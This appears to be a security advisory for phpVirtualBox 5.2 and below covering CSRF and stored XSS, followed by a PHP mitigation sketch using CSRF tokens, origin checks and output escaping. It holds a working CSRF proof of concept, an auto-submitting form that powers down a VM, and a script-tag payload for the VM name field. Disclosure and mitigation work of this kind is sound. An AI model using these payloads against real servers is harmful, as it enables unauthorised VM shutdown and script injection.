phpVirtualBox 5.2 Cross Site Request Forgery / Cross Site Scripting

phpVirtualBox versions 5.2 and below suffer from cross site request forgery and cross site scripting vulnerabilities.

MD5 | 6f277017b55f2e0f361b3b4855a39fde

# Title: phpVirtualBox / CSRF - Stored XSS
# Date: 03/04/2018
# Discovered by: @codexlynx
# Software Version: <= 5.2
# Category: php, web, csrf, xss

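[1] CSRF
The backend does not validate the origin of the requests that perform actions, so a page on another site can submit them on behalf of a logged-in user.

- POC: Shut down a VM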

<body onload="document.csrf.submit();">
<form method="post" action="<TARGET>/<PHPVB_PATH>/lib/ajax.php" name="csrf">
<input type="hidden" name="vm" value="<VM_ID>" />
<input type="hidden" name="state" value="powerDown" />
<input type="hidden" name="fn" value="machineSetState" />
</form>
</body>

[2] Stored XSS
Many fields don't sanitize their input. This vulnerability could allow user role escalation in the application.

- POC: Insert a persistent script in the vm name field.

New (Create Virtual Machine) -> Name: <script>alert(1);</script>Test
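
Mitigation sketch for both issues above, as an added example that is not part of the original advisory and is not phpVirtualBox code. The function names, the "csrf" form field and the X-CSRF-Token header are assumptions, and the escaping helper assumes the stored name is written into HTML by PHP.

```php
<?php
declare(strict_types=1);
// Hypothetical guard for a state-changing POST endpoint plus an output encoder.

function csrf_token(): string
{
    // One random token per session, embedded in the page and echoed back on each POST.
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}

function same_origin(array $server): bool
{
    // Browsers send Origin on cross-site POSTs; fall back to Referer when it is absent.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($source, PHP_URL_HOST);
    $port = parse_url($source, PHP_URL_PORT);
    if (!is_string($host)) {
        return false; // missing, "null" or malformed origin is rejected
    }
    $seen = $port === null ? $host : "$host:$port";
    return hash_equals(strtolower($server['HTTP_HOST'] ?? ''), strtolower($seen));
}

function guard_post(): void
{
    // Call after session_start() and before dispatching any action.
    $sent = $_SERVER['HTTP_X_CSRF_TOKEN'] ?? $_POST['csrf'] ?? '';
    $ok = ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST'
        && same_origin($_SERVER)
        && is_string($sent)
        && hash_equals(csrf_token(), $sent);
    if (!$ok) {
        http_response_code(403);
        exit('request rejected');
    }
}

function e(string $value): string
{
    // Encode on output so a stored name containing markup is rendered as text.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

if (PHP_SAPI === 'cli') { // constructed sample values, run with: php example.php
    var_dump(same_origin(['HTTP_HOST' => 'vbox.example', 'HTTP_ORIGIN' => 'https://other.example']));
    var_dump(same_origin(['HTTP_HOST' => 'vbox.example', 'HTTP_ORIGIN' => 'https://vbox.example']));
    echo e('<script>alert(1);</script>Test'), PHP_EOL;
}
```

The token check is the primary control. The origin comparison is defence in depth, and it assumes HTTP_HOST reflects the host the browser addressed, which may not hold behind a reverse proxy that rewrites it.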

